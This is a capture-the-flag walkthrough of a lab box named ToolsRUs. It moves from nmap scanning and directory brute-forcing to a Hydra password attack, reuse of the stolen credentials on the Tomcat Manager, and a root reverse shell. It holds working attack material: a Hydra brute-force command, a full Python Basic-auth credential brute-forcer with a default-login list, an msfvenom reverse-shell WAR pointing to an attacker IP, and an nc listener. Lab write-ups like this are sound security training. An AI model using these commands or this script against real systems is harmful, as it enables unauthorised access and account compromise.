ToolsRUs
Description
Practise using tools such as dirbuster, hydra, nmap, nikto and metasploit
In this section I walk through gaining access to the machine by exploiting its exposed services: Apache httpd on port 80, and Apache Tomcat 7.0.88, reached through its Coyote HTTP connector on port 1234 and its AJP (Apache JServ Protocol) connector on port 8009.
Scanning

- Assigned IP address: 10.10.4.144
- Open Ports:
| Port | Service | Description |
|---|---|---|
| 22/TCP | SSH | OpenSSH 7.2p2 Ubuntu |
| 80/TCP | HTTP | Apache httpd 2.4.18 |
| 1234/TCP | HTTP | Apache Tomcat 7.0.88 (Coyote JSP engine 1.1) |
| 8009/TCP | AJP13 | Apache JServ Protocol v1.3 (Tomcat AJP connector) |
- Nmap Report:

```
# Nmap 7.93 scan initiated Wed Feb 22 10:11:28 2023 as: nmap -sC -sV -O -oN nmap.txt 10.10.4.144
Nmap scan report for 10.10.4.144
Host is up (0.15s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 460e76fbb6a2f7f78536656f8809f7e8 (RSA)
|   256 a1bc5d3478f4e8d4091805ef9d9072c5 (ECDSA)
|_  256 0757145539dfc56296f9fc4883cf127e (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
1234/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/22%OT=22%CT=1%CU=33697%PV=Y%DS=5%DC=I%G=Y%TM=63F630B
OS:F%P=aarch64-unknown-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS
OS:=8)OPS(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M
OS:505ST11NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68
OS:DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y
OS:%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T
OS:=40%CD=S)

Network Distance: 5 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 22 10:11:59 2023 -- 1 IP address (1 host up) scanned in 30.78 seconds
```
Enumerating Apache Coyote JSP Engine (Tomcat)

At first, my plan was to exploit Tomcat by uploading a malicious WAR file through the Manager application to obtain a shell, a method I was already comfortable with. However, the Manager sits behind HTTP Basic authentication and I could not get past it.

In my attempts to get into the Tomcat Manager I first tried a Python script that brute-forces the well-known default Tomcat logins (tomcat:tomcat, admin:admin and the like). That failed too: none of the defaults were accepted.
Enumerating the HTTP Server

I then shifted my focus to the HTTP server on port 80, which served a simple placeholder page hinting that the site was still under development.

Running dirsearch (a Python directory brute-forcer) against it turned up hidden pages and directories that could provide further clues and entry points.
Exploiting the '/guidelines' page

dirsearch identified two promising directories: /protected and /guidelines. The former sounded highly secured, but, to my surprise, it was not. While I was filling in the room's questions I checked the /guidelines page and found that it mentioned a username, bob.

/protected was guarded by a plain HTTP Basic authentication prompt, which Hydra can brute-force directly with its http-get module; with the username already known, only the password had to be guessed:

Hydra Command
```
hydra $IP -l bob -P ~/rockyou.txt http-get /protected -V
```

Hydra recovered Bob's password, and logging in with it gave me access to the /protected directory I had found earlier.
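Both guessing attempts above are the same operation: send an HTTP Basic `Authorization` header and read the status code. The following added example (my own code, not the author's script, and not a replacement for Hydra's speed) does that for both cases: Tomcat's well-known default Manager logins against `/manager/html`, and one known username (bob) against a wordlist on `/protected`. It assumes a rejected login answers 401 and an accepted one 200; the default-credential list is a constructed subset for illustration, not something taken from the box.

```python
"""
HTTP Basic-auth credential checker (added example, not the author's script).
Assumptions: a bad login returns 401, a good one 200; the default-credential
list below is a constructed subset for illustration.
"""
import base64
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Optional, Tuple

Cred = Tuple[str, str]

# Well-known Tomcat Manager defaults (constructed subset for this example).
TOMCAT_DEFAULT_CREDS: List[Cred] = [
    ("tomcat", "tomcat"),
    ("tomcat", "s3cret"),
    ("admin", "admin"),
    ("admin", ""),
    ("manager", "manager"),
    ("role1", "tomcat"),
]


def basic_auth_header(user: str, password: str) -> str:
    """RFC 7617 Basic credential: 'Basic ' + base64('user:password')."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


def http_status(url: str, auth_header: str, timeout: float = 5.0) -> int:
    """GET the URL with an Authorization header and return the HTTP status."""
    req = urllib.request.Request(url, headers={"Authorization": auth_header})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code  # 401/403 are answers, not transport errors


def find_valid_login(url: str, candidates: Iterable[Cred],
                     fetch: Callable[[str, str], int] = http_status
                     ) -> Optional[Tuple[str, str, int]]:
    """Try each (user, password); return (user, password, status) for the
    first one the server accepts, else None.

    200 is a clean success. 403 is reported as well: Tomcat answers 403 when
    the credentials are valid but the account lacks the role the Manager
    needs, which is still worth knowing. Any other status (e.g. 404 because
    the path is wrong) aborts the run instead of silently burning the wordlist.
    """
    for user, password in candidates:
        status = fetch(url, basic_auth_header(user, password))
        if status in (200, 403):
            return user, password, status
        if status != 401:
            raise RuntimeError(f"unexpected HTTP {status} from {url}; wrong path?")
    return None


def wordlist_candidates(user: str, path: str) -> Iterable[Cred]:
    """Pair one username with every line of a wordlist (rockyou-style)."""
    with open(path, encoding="latin-1", errors="ignore") as fh:
        for line in fh:
            yield user, line.rstrip("\r\n")


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://10.10.4.144"
    # 1. Default Manager logins (the attempt that failed on this box).
    print("manager defaults:",
          find_valid_login(f"{target}:1234/manager/html", TOMCAT_DEFAULT_CREDS))
    # 2. bob against a wordlist on /protected (what Hydra did above).
    if len(sys.argv) > 2:
        print("/protected:",
              find_valid_login(f"{target}/protected/",
                               wordlist_candidates("bob", sys.argv[2])))
```

The `fetch` parameter is injectable so the decision logic can be exercised without a network; the 403 case matters in practice because a valid Tomcat account without `manager-gui` looks like a failure to a naive "200 or nothing" check.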
Exploiting Apache Tomcat with Harvested Credentials

Once inside /protected I realised that the Tomcat Manager on port 1234 is protected by the same kind of HTTP Basic authentication prompt, and that it accepted the same credentials: bob and the password recovered above. This allowed me to reuse the credentials I had harvested. With access to the Manager I uploaded a Java WAR file containing a reverse shell, generated with msfvenom:

Msfvenom Payload
```
msfvenom -p java/shell_reverse_tcp lhost=10.17.3.217 lport=5432 -f war -o shell.war
```

I started a listener first (for example `nc -lvnp 5432`), then browsed to http://10.10.4.144:1234/shell/, which runs the deployed payload and connects the shell back to me.
Gaining root access

Surprisingly, the shell came back as root rather than the expected www-data (or tomcat) service account. The JSP runs inside Tomcat's JVM, so the shell inherits whatever user Tomcat was started as; here that was root, which is why one reused password ended in full host compromise. Tomcat should be started as a dedicated unprivileged user for exactly this reason. Easy-Peasy.

```
root@ip-10-10-4-144:/# cat root/*
cat root/*
[REDACTED]
cat: root/snap: Is a directory
```

Peace-out!